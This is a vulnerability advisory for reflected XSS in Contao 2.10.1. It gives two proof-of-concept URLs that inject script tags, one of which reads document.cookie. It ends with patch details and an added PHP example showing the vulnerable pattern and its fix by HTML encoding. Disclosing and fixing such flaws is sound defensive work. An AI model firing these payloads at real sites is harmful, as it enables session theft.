Author: Stefan Schurtz
Affected software: Successfully tested on Contao 2.10.1
Vendor website: http://www.contao.org/
Official patch: fixed
Overview
==========================
Contao 2.10 contains multiple cross-site scripting (XSS) vulnerabilities
==================
Technical analysis
==================
http://www.2cto.com/contao-2.10.1/index.php/teachers.html?"/><script>alert('xss')</script>
http://www.2cto.com/contao-2.10.1/index.php/teachers/'"</style></script><script>alert(document.cookie)</script>
=========
Solution:
=========
- Official patch - http://dev.contao.org/projects/typolight/repository/revisions/1041
- Release of a new version 2.10.2 next week
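
An added example (not code from the advisory or from Contao): the two request strings from the technical analysis are passed through a hypothetical template that echoes the request URI into an attribute, first raw and then HTML-encoded. The function names and the `<form action>` sink are assumptions; the advisory does not say where the value is reflected.

```php
<?php
// Added illustration; not Contao's code. The sink (a form action attribute)
// and all function names are hypothetical.

// Constructed inputs: path/query portions of the two URLs in the advisory.
$samples = [
    '/contao-2.10.1/index.php/teachers.html?"/><script>alert(\'xss\')</script>',
    '/contao-2.10.1/index.php/teachers/\'"</style></script><script>alert(document.cookie)</script>',
];

// Vulnerable pattern: raw request URI placed inside a double-quoted attribute.
// A '"' in the URI ends the attribute and the rest is parsed as markup.
function render_unsafe(string $uri): string
{
    return '<form action="' . $uri . '" method="post">';
}

// Hardened pattern: encode for the HTML context before output.
// ENT_QUOTES covers both quote styles used by the two request strings;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function render_safe(string $uri): string
{
    $enc = htmlspecialchars($uri, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<form action="' . $enc . '" method="post">';
}

// Regression check: does the rendered output contain a literal opening or
// closing <script>/<style> tag that came from the request?
function has_markup_breakout(string $html): bool
{
    return (bool) preg_match('~</?(script|style)\b~i', $html);
}

foreach ($samples as $uri) {
    printf(
        "unsafe breakout=%s  safe breakout=%s\n",
        var_export(has_markup_breakout(render_unsafe($uri)), true),
        var_export(has_markup_breakout(render_safe($uri)), true)
    );
}
```

HTML encoding is the right fix for element and attribute contexts; request data should not be written into inline `<script>` or `<style>` blocks at all, which is the context the second request string is shaped for.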